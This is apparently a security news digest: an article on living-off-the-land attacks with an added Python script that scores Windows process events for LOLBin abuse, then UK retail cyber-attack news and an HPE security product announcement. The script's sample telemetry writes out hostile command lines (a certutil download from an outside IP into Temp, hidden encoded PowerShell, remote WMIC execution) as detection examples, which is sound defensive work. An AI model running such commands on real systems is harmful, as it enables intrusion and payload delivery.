Living-off-the-land attacks are rising fast. Learn why they work — and how tailored hardening helps stop them without disrupting your business.
Living-off-the-land (LotL) attacks — where adversaries exploit legitimate system tools to carry out malicious activities — are becoming increasingly prevalent and sophisticated. Bitdefender’s internal threat analysis reveals that nearly 70% of successful cyberattacks utilize LotL techniques.
What’s driving this surge? An overreliance on detection, an unnecessarily large attack surface at nearly every organization, and a failure of traditional application control and attack surface reduction rules. You might call it a living-off-the-land trifecta.
Leaked Threat Actor Chats: We Live Off the Land
When someone leaked communications from the Black Basta ransomware group, it revealed the group’s LotL strategy. One of the group’s leaders shared: “If we use standard utilities, we won’t be detected… we never drop tools on machines.”
In other words, instead of the noisy attacks of the past, they leverage your legitimate tools and applications to secretly go deeper into your environment, most often leveraging this access for ransomware and data exfiltration.
These attacks are popular for four main reasons. They leverage what’s already there, so threat actors can avoid investing in tools of their own. They also cover all stages of an attack, from initial reconnaissance to lateral movement, data exfiltration, and even data encryption. And many of these tools are flexible, so threat actors can adapt them to their needs.
And perhaps the biggest advantage of LotL attacks is the ability to blend seamlessly with normal system activity. By using legitimate tools, attackers bypass legacy security solutions that rely on detecting suspicious custom tools and behavior.
Attack Surfaces and Failed Controls
For years now, IT and security teams have tried to minimize their attack surface with application allow lists. Allow lists do shrink the attack surface somewhat, but they often leave key preinstalled binaries and utilities permitted, and on anything other than fixed-function devices they impair productivity or add overhead for IT teams. Attack surface reduction rules suffer the same fate: as modern environments evolve rapidly, keeping up with changes and exceptions becomes overwhelming for administrative teams.
This is why attackers can now count on finding legitimate tools to abuse and can expect to remain hidden in their victims' environments. To avoid slowing down the business, organizations have invested in detection and response capabilities meant to discover and stop attackers who blend in using trusted tools. But even the best security operations teams struggle to tell an employee's legitimate use of a tool from an attacker's use of the same tool, and that ambiguity can give attackers the time they need to achieve their goals.
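The point above, that the binary alone is not the signal, is easiest to see in code. The following Python is an added illustration written for this page, not code from Bitdefender, Dark Reading or any vendor. It scores constructed process-creation events (Sysmon-style fields: user, parent image, image, command line) on independent contextual signals: a LOLBin spawned by an Office application, a remote URL or download switch in the arguments, an encoded PowerShell command, a payload path in a user-writable directory, a remote host targeted for execution. Only high scores are escalated, and a small tuned baseline of (account, binary) pairs the hypothetical environment has confirmed as routine is discounted, which is exactly the exception upkeep the text describes. All binary lists, weights, thresholds, accounts and telemetry are assumptions.

```python
"""Contextual scoring of process-creation events for LotL tool abuse.

Added illustration for this page, not code from Bitdefender, Dark Reading or
any vendor.  A LOLBin (certutil.exe, rundll32.exe, ...) is rarely suspicious
on its own; the signal lives in the context: which parent spawned it, what the
command line asks it to do, and whether that account routinely uses it.  Each
independent signal adds to a score and only high scores are escalated, so
routine administrative use of the same binaries stays quiet.
"""
import re

# Native Windows binaries commonly abused to download, decode, execute or proxy.
LOLBINS = {"certutil.exe", "rundll32.exe", "mshta.exe", "regsvr32.exe",
           "wmic.exe", "bitsadmin.exe", "powershell.exe", "msiexec.exe"}

# Parents that should almost never spawn a LOLBin: office suites, mail, browsers.
USER_APP_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "chrome.exe",
                    "msedge.exe", "acrord32.exe"}

# (pattern, weight, label): command-line traits of fetch / decode / execute / pivot.
# Weights are assumptions; tune them against your own telemetry.
ARG_SIGNALS = [
    (re.compile(r"https?://", re.I),                       2, "remote URL in arguments"),
    (re.compile(r"-urlcache|-decode|/transfer", re.I),     2, "download or decode switch"),
    (re.compile(r"-enc(odedcommand)?\b", re.I),            3, "encoded PowerShell command"),
    (re.compile(r"-w(indowstyle)?\s+hidden|-nop\b", re.I), 1, "hidden window / no profile"),
    (re.compile(r"\\temp\\|\\appdata\\", re.I),            1, "payload in user-writable directory"),
    (re.compile(r"javascript:|vbscript:", re.I),           3, "inline script via mshta/rundll32"),
    (re.compile(r"/node:|\\\\\w+\\(c|admin)\$", re.I),     2, "remote host targeted (possible lateral movement)"),
]

# Tuned exceptions: (account, binary) pairs this hypothetical environment has
# confirmed as routine.  This is the per-environment upkeep the text describes.
BASELINE = {("corp\\svc-patch", "bitsadmin.exe")}
BASELINE_DISCOUNT = 3
ESCALATE_AT = 4   # scores at or above this reach an analyst


def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def score_event(event):
    """Score one process-creation event; returns (score, reasons).

    Images that are not LOLBins score 0 here; other rule sets cover them.
    """
    image, parent = _basename(event["image"]), _basename(event["parent_image"])
    if image not in LOLBINS:
        return 0, []
    score, reasons = 0, []
    if parent in USER_APP_PARENTS:
        score += 3
        reasons.append(f"{image} spawned by user application {parent}")
    for pattern, weight, label in ARG_SIGNALS:
        if pattern.search(event["command_line"]):
            score += weight
            reasons.append(label)
    if (event["user"].lower(), image) in BASELINE:
        score = max(0, score - BASELINE_DISCOUNT)
        reasons.append("matches tuned baseline for this account")
    return score, reasons


def triage(events, threshold=ESCALATE_AT):
    """Return (image, score, reasons) for every event that reaches the threshold."""
    hits = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append((_basename(ev["image"]), score, reasons))
    return hits


# Constructed telemetry for the example; not captured from any real host.
EVENTS = [
    # An administrator verifying a certificate from a console: benign.
    {"user": "CORP\\jdoe-admin", "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\certutil.exe",
     "command_line": r"certutil -verify C:\certs\server.cer"},
    # Word spawning certutil to fetch a file into the user's temp directory.
    {"user": "CORP\\bob", "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\certutil.exe",
     "command_line": r"certutil -urlcache -split -f http://203.0.113.10/a.txt C:\Users\bob\AppData\Local\Temp\a.txt"},
    # Hidden, profile-less PowerShell with an encoded command (placeholder base64).
    {"user": "CORP\\bob", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell -nop -w hidden -enc SQBFAFgAIAAoAA=="},
    # Remote process creation by an admin: worth noting, not enough alone.
    {"user": "CORP\\jdoe-admin", "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\wbem\wmic.exe",
     "command_line": r'wmic /node:FS01 process call create "cmd /c whoami"'},
    # Patch service account downloading with bitsadmin: covered by the baseline.
    {"user": "CORP\\svc-patch", "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\bitsadmin.exe",
     "command_line": r"bitsadmin /transfer job http://updates.internal/patch.msi C:\Windows\Temp\patch.msi"},
]

if __name__ == "__main__":
    for name, score, reasons in triage(EVENTS):
        print(f"ESCALATE {name} score={score}: " + "; ".join(reasons))
```

Run as a script it escalates only the Word-spawned certutil download and the hidden encoded PowerShell; the admin's certutil verification, the single remote WMIC call and the baselined bitsadmin transfer stay below the threshold. The design point is that every signal is cheap on its own and only their combination is escalated, which is what lets the same rule set cover both the attacker's certutil and the administrator's.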
Stay updated with SOC News for cutting-edge security innovations and expert industry insights!
Source: https://www.darkreading.com/endpoint-security/lotl-attacks-new-defensive-strategy
“These attacks need to be a wake-up call for every business in the UK,” Pat McFadden, chancellor of the Duchy of Lancaster, said.
Recent cyber-attacks and attempted hacks at some of the UK’s biggest retailers – Marks & Spencer, Co-op, and Harrods – have sparked a government response as fears mount across the retail sector.
The cyber-attacks all took place within a matter of days, impacting internal IT systems, and in the case of Co-op, even potentially affecting customer data, the BBC reported.
The UK’s National Cyber Security Centre is working with the affected organisations to better understand the nature of the attacks, which left M&S with empty shelves and disrupted Co-op’s Teams communications.
The NCSC cannot currently say whether these attacks are linked or part of a targeted campaign, but noted speculation that the M&S attack was carried out by the cyber-crime group Scattered Spider, and that remote access could have been obtained through social engineering.
Pat McFadden, chancellor of the Duchy of Lancaster, will set out action the government is taking to improve cybersecurity in a speech this week.
McFadden will call these attacks a “wake-up call for every business in the UK.”
“In a world where the cyber-criminals targeting us are relentless in their pursuit of profit – with attempts being made every hour of every day – companies must treat cybersecurity as an absolute priority.
“We’ve watched in real-time the disruption these attacks have caused – including to working families going about their everyday lives. It serves as a powerful reminder that, just as you would never leave your car or your house unlocked on your way to work, we have to treat our digital shop fronts the same way.”
The NCSC is urging leaders to follow the advice on the NCSC website to ensure they have appropriate measures in place to help prevent attacks and respond and recover effectively.
These include back-to-basics measures ranging from multi-factor authentication, enhanced monitoring for unauthorised account use and for suspicious domains, and password reviews, to stronger identity verification and better threat management.
McFadden will also lay out how the government is aiming to enhance the UK’s cyber protections.
“We’re modernising the way the state approaches cyber, through the Cyber Security and Resilience Bill. That legislation will bolster our national defences,” McFadden will say.
“It will grant new powers for the Technology Secretary to direct regulated organisations to reinforce their cyber defences. It will require over 1,000 private IT providers to improve their data and network security.
“It will require companies to report a wider array of cyber incidents to the NCSC in the future – to help us build a clearer picture of who, and what, hostile actors are targeting.”
While the NCSC says it has provided specific guidance to the retail sector, the centre “believe[s] by following best practice, all companies and organisations can minimise the chances of falling victim to actors like this.”
Source: https://www.digit.fyi/cyber-attacks-a-wake-up-call-to-retail-sector/
Hewlett Packard Enterprise has announced an expansion of its HPE Aruba Networking and HPE GreenLake cloud offerings to support enterprises in enhancing secure connectivity and hybrid cloud operations.
New capabilities now available in HPE Aruba Networking Central include cloud-based access control security designed to accelerate enterprise-grade zero trust security. This approach treats every user, device, and application as a potential threat until verified, employing robust policy capabilities to strengthen protection measures. Additionally, HPE Private Cloud Enterprise introduces threat-adaptive security features to support compliance with the Digital Operations Resilience Act (DORA), offering the capability to disconnect from the public internet when a network threat is detected.
Phil Mottram, Executive Vice President and General Manager, HPE Aruba Networking, commented on the evolving cyber threat landscape and the need for advanced security: “With the rise in adoption of data-fueled AI applications, organisations are facing more sophisticated threats to anywhere data is stored, captured or transmitted. HPE’s security solutions deliver advanced protection to help organisations mitigate risk, defend against attacks and build resiliency.”
The new features in HPE Aruba Networking Central Network Access Control (NAC) include precision cloud-based access controls, enabling IT teams to define and implement role-based policies for user and device identification. These enhancements are designed to help enterprises advance universal zero trust network access initiatives. Additional features, such as Intrusion Detection System (IDS), Intrusion Prevention System (IPS), AI-powered observability, and microsegmentation, are aimed at reducing the impact of potential security breaches.
Among the new security functionalities are the Enhanced Policy Manager for HPE Aruba Networking Central NAC, which establishes detailed network access policies—such as application-to-role, role-to-subnet, and role-to-role policies. This ensures consistent enforcement of security and compliance across edge-to-cloud networks.
Integration between HPE Aruba Networking Central and HPE OpsRamp has been strengthened to provide native monitoring of third-party devices from vendors like Cisco, Arista, and Juniper Networks. Enhanced application profiling, classification, and risk assessment tools now give enterprises the capacity to establish application-specific access policies based on risk criteria.
Updates to HPE Aruba Networking EdgeConnect SD-WAN bring new Secure Access Service Edge (SASE) integration and Adaptive Distributed Denial-of-Service (DDoS) defence capabilities. These use machine learning to dynamically adjust DDoS protections in real time. All Zero Trust Network Access (ZTNA) customers now receive a complimentary licence for HPE Aruba Networking Private Edge.
HPE Aruba Networking SSE offers new high-availability and high-performance mesh connectivity for routing traffic between global points of presence, aiming to improve reliability and resiliency. Mesh connectivity automatically determines the fastest secure path for data, providing alternative routes and automatic recovery to ensure continued security, without requiring manual intervention by IT teams.
On the private cloud front, HPE GreenLake receives further security enhancements intended to protect against emerging threats and to support compliance with new regulations. HPE Private Cloud Enterprise now features threat-adaptive security, capable of temporarily isolating critical systems by disconnecting from the public internet when a threat is detected. This function acts as a “digital circuit breaker” and is designed to minimise impacts before securely reconnecting systems once the threat is resolved. These features specifically address requirements for regulated industries, including the financial sector, under DORA.
HPE also announced the general availability of air-gapped cloud management through HPE Private Cloud Enterprise. This service enables customers in regulated industries or government to manage private cloud infrastructure entirely on-premises, without any external connectivity, and is deployed by security-cleared HPE staff. Future enhancements will allow cloud-native and Kubernetes workloads to be managed with the same air-gapped approach.
Additional offerings include HPE Cybersecurity Services for sovereign cloud, providing expertise to integrate sovereign security solutions into an organisation’s risk management framework. New cybersecurity services focused on AI aim to give customers governance and compliance support while transforming operations to predict and counter both traditional and AI-driven threats.
The integration between HPE’s OpsRamp and CrowdStrike provides unified observability and real-time threat detection, designed to enhance performance and resilience for enterprise systems.
HPE’s announcement comes as the company marks a year since signing the CISA Secure by Design pledge. HPE reports that it deploys more than 2,200 security controls within HPE GreenLake, and utilises Zero Trust frameworks to meet requirements set by CIS, CISA Secure by Design, STIG, and DORA.
Other advancements in HPE’s secure by design initiatives include Aruba Networking’s AI-based network detection and response (NDR), ransomware protection through the HPE Cyber Resilience Vault, and the introduction of the HPE ProLiant Compute Gen12 portfolio with HPE Integrated Lights Out 7. The new servers also provide a silicon root of trust and feature post-quantum cryptography capabilities meeting FIPS 140-3 Level 3 security certification.
Source: https://datacentrenews.uk/story/hpe-unveils-enhanced-ai-powered-security-for-cloud-network